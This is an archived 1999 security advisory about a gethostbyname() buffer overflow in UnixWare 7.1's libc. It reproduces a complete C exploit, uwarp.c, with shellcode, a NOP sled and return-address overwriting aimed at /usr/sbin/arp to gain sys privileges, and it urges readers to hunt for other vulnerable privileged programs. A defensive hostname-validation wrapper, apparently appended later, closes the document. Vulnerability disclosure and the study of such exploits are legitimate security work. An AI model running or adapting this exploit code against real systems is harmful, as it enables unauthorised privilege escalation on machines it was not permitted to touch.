The OpenNET Project
UnixWare 7 gethostbyname() overflow


Date: Thu, 2 Dec 1999 09:22:57 MST
From: Brock Tellier <[email protected]>
To: [email protected]
Subject: UnixWare 7 gethostbyname() overflow

Greetings,

OVERVIEW
A serious bug exists in UnixWare 7.1's libc.  A buffer overflow in
gethostbyname() will allow any user to obtain elevated privileges.

BACKGROUND
Is this the same gethostbyname() overflow which was present in ancient 
versions of non-unixware libc's way back when?  I can't say for sure, but
given SCO's record of fixing known holes (remember the OpenServer 5
Xtlib overflows, still present four years after they were known?), I 
wouldn't doubt it.

DETAILS
Any program which uses gethostbyname() with user-defined input is
vulnerable to a buffer overflow attack.  These overflows come with
various eases of exploitability.  My demonstration program happened to
be "arp", but any program calling this function will do.  When exploiting
the dozens of programs vulnerable to this hole, don't forget to check
your /etc/security/tcb/privs file for other non-suid programs which may
allow you to elevate your privileges as well. See my uidadmin advisory
for more info on UW7's privilege system.

EXPLOIT
--- uwarp.c ---
/**
 ** UnixWare 7.1 arp exploit yields gid of sys
 ** Demonstrates overflow in uw71's gethostbyname()
 ** use offsets of +-100
 ** Brock Tellier [email protected]
 **
 **/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* execl */

char scoshell[]=
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/ui\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

#define LEN 3500
#define NOP 0x90

/* cc != gcc, use hard-coded addresses usually within 0x8045xxxx-0x8048xxxx
unsigned long get_sp(void) {

__asm__("movl %esp, %eax");

}
*/

int main(int argc, char *argv[]) {

  long int offset=0;
  int i;
  int buflen = LEN;
  long int addr;
  char buf[LEN];

  if(argc > 3) {
    fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
    exit(0);
  }
  else if (argc == 2) {
    offset=atoi(argv[1]);
  }
  else if (argc == 3) {
    offset=atoi(argv[1]);
    buflen=atoi(argv[2]);
  }
  else {
    offset=100;
    buflen=3000;
  }

  /* buf holds only LEN bytes; a larger user-supplied length would overrun it */
  if (buflen > LEN)
    buflen = LEN;

  addr=0x8046b75 + offset;

  fprintf(stderr, "\nUnixWare 7.1 arp exploit yields uid of sys\n");
  fprintf(stderr, "Brock Tellier [email protected]\n\n");
  /* addr already includes the offset */
  fprintf(stderr, "Using addr: 0x%lx\n", addr);

  /* NOP sled, shellcode in the middle, then the return address repeated */
  memset(buf,NOP,buflen);
  memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
  for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4)
    *(int *)&buf[i]=addr;
  buf[buflen-1]='\0';   /* execl() needs a terminated argument string */

  execl("/usr/sbin/arp", "arp", buf, NULL);

  exit(0);
}

------
Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
[email protected]
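The DETAILS section above notes that any privileged program passing user input straight into gethostbyname() inherits the libc overflow. The following is an added example, not code from the advisory or from SCO: a caller-side guard that bounds the name to DNS limits before libc sees it, with `hostname_is_safe`, `safe_gethostbyname` and the 3000-byte test name being this example's own constructions.

```c
/* Added example, not code from the advisory: a caller-side guard for
 * gethostbyname() on user-supplied names (argv, as in arp).  The overflow
 * is inside libc, so a privileged caller should refuse names beyond DNS
 * limits (RFC 1123: labels 1..63 chars, name <= 253, [A-Za-z0-9-] and '.'). */
#define _DEFAULT_SOURCE
#include <ctype.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>

#define MAX_HOSTNAME 253
#define MAX_LABEL     63

/* Returns 1 if name is a bounded, syntactically valid hostname, else 0. */
int hostname_is_safe(const char *name) {
    size_t len = strlen(name), label = 0;
    if (len == 0 || len > MAX_HOSTNAME)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == '.') {
            if (label == 0) return 0;            /* empty label: ".a", "a..b" */
            label = 0;
            continue;
        }
        if (!isalnum(c) && c != '-') return 0;   /* also drops raw bytes like 0x90 */
        if (c == '-' && label == 0) return 0;    /* label may not start with '-' */
        if (++label > MAX_LABEL) return 0;
    }
    return 1;                                    /* trailing '.' (FQDN form) is fine */
}

/* Drop-in for a bare gethostbyname(argv[n]) in a privileged tool. */
struct hostent *safe_gethostbyname(const char *name) {
    if (!hostname_is_safe(name)) {
        fprintf(stderr, "refusing hostname: bad syntax or > %d bytes\n", MAX_HOSTNAME);
        return NULL;
    }
    return gethostbyname(name);
}

int main(void) {
    char big[3001];              /* constructed: a 3000-byte name, the advisory's default size */
    memset(big, 'A', 3000);
    big[3000] = '\0';
    printf("3000-byte name accepted: %d, example.com accepted: %d\n",
           hostname_is_safe(big), hostname_is_safe("example.com"));   /* 0, 1 */
    return 0;
}
```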

